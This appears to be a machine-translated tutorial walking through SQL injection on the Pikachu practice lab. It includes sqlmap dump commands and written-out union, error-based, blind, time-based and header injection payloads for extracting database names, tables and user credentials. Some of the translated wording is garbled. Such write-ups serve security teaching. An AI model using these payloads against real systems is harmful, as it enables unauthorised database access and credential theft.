Table of contents
8. Blind injection (base on boolian) is based on error reporting
9. Blind (base on time) based on time
1. SQL injection
1 Introduction
official introduction
The main reason for the SQL injection vulnerability is that in the data interaction, when the front-end data is passed to the background for processing, no strict judgment is made, which leads to the fact that the incoming "data" is spliced into the SQL statement and is regarded as the content of the SQL statement. Partial execution. As a result, the database is damaged (it is taken off, deleted, or even the entire server authority falls).
When building code, the following strategies are generally used to prevent SQL injection vulnerabilities:
1. Filter the variables passed into the SQL statement, and do not allow dangerous characters to be passed in;
2. Use parameterization (Parameterized Query or Parameterized Statement);
3. In addition, there are currently many ORM frameworks that automatically use parameterization to solve the injection problem, but they also provide a "stitching" method, so you need to be careful when using it!
Two, sqlmap
1 Introduction
sqlmap is an automated tool for detecting sql injection
--batch: With this parameter, no user input is required, and the default value prompted by sqlmap will be used to run forever.
--technique: Select the injection technique, B: Boolean-based-blind (Boolean blind injection)
--threads 10 : set the thread to 10, the running speed will be faster
#Query Database#【security】
Specify the target U
Use the parameter -u or –url to specify a URL as the target, which is followed by a string representing the URL, and the port can also be specified.
(2) GET type
* Check the injection point
sqlmap.py -u URL
* Explode all databases
sqlmap.py -u URL --cshiurrent --dbs
* Explode table
sqlmap.py -u URL -D database name --tables
* Explode column
sqlmap.py - u URL-D database name-T table name--columns
* burst value
sqlmap.py -u URL-D database name-T table name-C field name--dump
(3) POST type
* Scan injection type
payload: python sqlmap.py -r "D:\post.txt"
* Explode all databases
python sqlmap.py -r "D:\post.txt" --dbs
* Explode table
python sqlmap.py - r "D:\post.txt" -D database name --tables
* Burst column
python sqlmap.py -r "D:\post.txt" -D database name -T table name --columns
* burst value
python sqlmap. py -r "D:\post.txt" -D database name -T table name -C field name --dump
Three, break through
1. Digital injection (post)
Enter the level and find that there are 6 numbers in the query box to choose from.
Query 1, the returned results are as follows, the url has not changed, because it is a post method.
bp packet capture
Use single quotes' to determine whether there is an injection point
1=2 echo error
id=1 and 1=1 The echo is normal, there is an injection point, and the digital injection is verified.
1.1 Guess the field length
order by x(number)
id=1 order by 2
order by 3 reports an error, indicating that there are two columns.
1.2 Query the database
id=1 union select database(),2# The field found in the previous step has two columns
Find the database pikachu
id=1 union select database(),version()#
1.3 Get the table name
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'#
1.4 Get the field name
id=1 union select group_concat(column_name),2 from information_schema.columns where table_name='users'# 
1.5 query field value
id=1 union select username,password from users#
The password is encrypted by md5, and jhttps://www.cmd5.com/ enters the website to decrypt it.
2. Character injection (get)
The content entered in the get method will be displayed in the url
2.1 Judging the injection type
We need to enter the name in the database, such as kobe
Without single quotation marks, an error will be reported. It is judged as character type injection.
2.2 Judgment number of characters
kobe' order by 2#
kobe' order by 3# 
So the number of fields is 2
2.3 Judging the display position
kobe' union select 1,2#
It is found that both positions 1 and 2 can be echoed correctly, and joint injection is used in positions 1 and 2.
2.4 Explosive library
1' union select 1,group_concat(schema_name) from (information_schema.schemata) #
所有数据库
1' union select 1,database() # 当前数据库 All databases:
Current database:
2.5 burst table
1' union select 1,group_concat(table_name)from(information_schema.tables) where table_schema='pikachu' # 数据库
2.6 Burst
1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='表名' # 当前数据库的指定表名
1' union select 1,group_concat(column_name) from (information_schema.columns) where table_name='表名' # 在所有数据库中指定一个表名
2.7 burst data
1' union select username,password from users#
3. Search injection
The general search bar exists in the form of '%keyword%', but it must be clearly distinguished whether it is a query in the page or a query in the database.
select username,id,email from member where username like '%$name%';
构造后
select username,id,email from member where username like '%kobe%' and 1=1 #';
4.xx type injection
The so-called xx-type injection means that the input value may be wrapped by various symbols (single quotes, double quotes, parentheses, etc.)
"select id,email from member where username=('$name')";
pyaload:
aaa') union select 'aaa',group_concat(concat_ws(':',username,password)) from pikachu.users#
5. "insert/update" injection
insert, insert injection refers to the information registered by our front end, and the background will insert it into the database through the insert operation. If the background does not prevent SQL injection for our input, we can splicing SQL injection during registration.
bp packet capture
Use error injection
You can use extractvalue or updatexml for error injection
EXTRACTVALUE (XML_document, XPath_string);
The first parameter: XML_document is in String format, which is the name of the XML document object. The
second parameter: XPath_string (string in Xpath format).
Function: Return the characters containing the queried value from the target XML The string
can be used for injection because when the xpath does not conform to the syntax, the statement will report an error XPATH syntax error: (injection information), so the information to be queried can be put into the xpath and displayed through error reporting.
Payload analysis: the single quotation mark after 1 is the single quotation mark before the closure, the last single quotation mark in the payload is the single quotation mark after the closure, which can be connected by or or and, and there are two in extractvalue() Parameters The first parameter can be filled in arbitrarily, the focus is on the second one here. concat() means that the return result is a string generated by connecting parameters, and 0x7e is the ASCII code, which means ~
Just replace the statement after select
payload:1' or extractvalue(1, concat(0x7e,(select database()),0x7e)) or '
payload:1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '
Similarly, when we log in, we can also use error injection.
payload:1' or updatexml(1,concat(0x7e,database(),0x7e),1) or '
6.delete injection
Delete the interface injection, write a message, click delete, and capture the packet.
id=99+or+updatexml(1,concat(0x7e,database()),1) #查询数据库
+or+updatexml(1,concat(0x7e,version()),0) #查询数据库版本
7. HTTP header injection
In addition to the injection between parameters, there may also be injection in the http header.
First, the login password must be correct. It is found that ip, user-agent, http-accept are all recorded in the database
Use error injection in user-agent
8. Blind injection (base on boolian) is based on error reporting
In some cases, the background uses the method of shielding errors to shield the error reporting, and at this time the injection judgment cannot be made based on the error reporting information.
The injection in this case is called "blind injection". That is to say, we can only judge whether the injected SQL statement has been successfully executed by checking whether the page is correct. In fact, many websites are also of the blind injection type.
kobe' and 1=1# 正常
kobe' and 1=2# 报错
In the process of Boolean blind injection, you need to use dichotomy and some mysql functions, such as mid(), ascii(), length(), etc.
ascii(): It returns the ASCII code of the leftmost character. Returns 0 if the string is empty, or NULL if the string is NULL.
length(): It returns the string length in byte type.
For example, if we want to explode the database name, we must first know the length of the database, and then explode each character of the database name one by one.
kobe' and length(database())>10 # ==> 页面错误
kobe' and length(database())>5 # ==> 页面正确
kobe' and length(database())>8 # ==> 页面错误
kobe' and length(database())>6 # ==> 页面正确
kobe' and length(database())=7 # ==> 页面正确
Next is every character, (similar to using a for loop to explode)
first character:
kobe' and ascii(mid(database(),1,1))>115 # ==> 页面错误
kobe' and ascii(mid(database(),1,1))>110 # ==> 页面正确
kobe' and ascii(mid(database(),1,1))>112 # ==> 页面错误
kobe' and ascii(mid(database(),1,1))=112 # ==> 页面正确The ascii code of the first character is 112, and the corresponding character is p
The remaining characters are exploded in turn: pikachu
- The number of all tables in the burst database
kobe' and (select count(table_name) from information_schema.tables where table_schema=database())>5 # ==> 页面错误
kobe' and (select count(table_name) from information_schema.tables where table_schema=database())=5 # ==> 页面正确The number of tables obtained is 5
- explode the length of the first table
kobe' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=8 # ==> 页面错误- Explode every character of the first table
kobe' and ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=104 # ==> 页面错误Get the first character of the first table as h, and then get the first table as httpinfo
- Explode the number of fields in the specified table
If we want to explode the number of fields in the users table now:
kobe' and (select count(column_name) from information_schema.columns where
table_schema=database() and table_name='users')=4 #It is known that the number of fields of users is 4
- explode the length of the first field
kobe' and length((select column_name from information_schema.columns where
table_schema=database() and table_name='users' limit 0,1))=2 #- Explode every value of the first field
kobe' and ascii(mid((select column_name from information_schema.columns where
table_schema=database() and table_name='users' limit 0,1),1,1))=105 #According to this idea, the entire database can be exploded.
Generally speaking, it is more troublesome, not practical, and only talks about ideas.
9. Blind (base on time) based on time
Boolean blind injection can also see whether the page is correct to judge whether the injected SQL statement is successfully executed, while delayed injection can not see any return information.
You can only judge whether the Boolean condition is true by executing the sleep() function through the return value of the Boolean condition to delay the response of the web page.
kobe' and sleep(5) # 延迟5秒There is a noticeable delay, indicating a boolean time injection.
数据库名长度不大于7 就延时9秒
kobe' and sleep(if(length(database())>7,0,9)) # ==> 延时
/数据库名长度等于7 就不延时
kobe'andsleep(if(length(database())=7,0,3)) # ==> 不延时
10. Wide byte injection
In actual websites, many special characters are escaped to filter the pollution of sql statements by special characters.
When a single quote is escaped as \' and the SQL statement cannot be constructed, wide-byte injection can be attempted.
Use %df and \wide bytes to form 'op
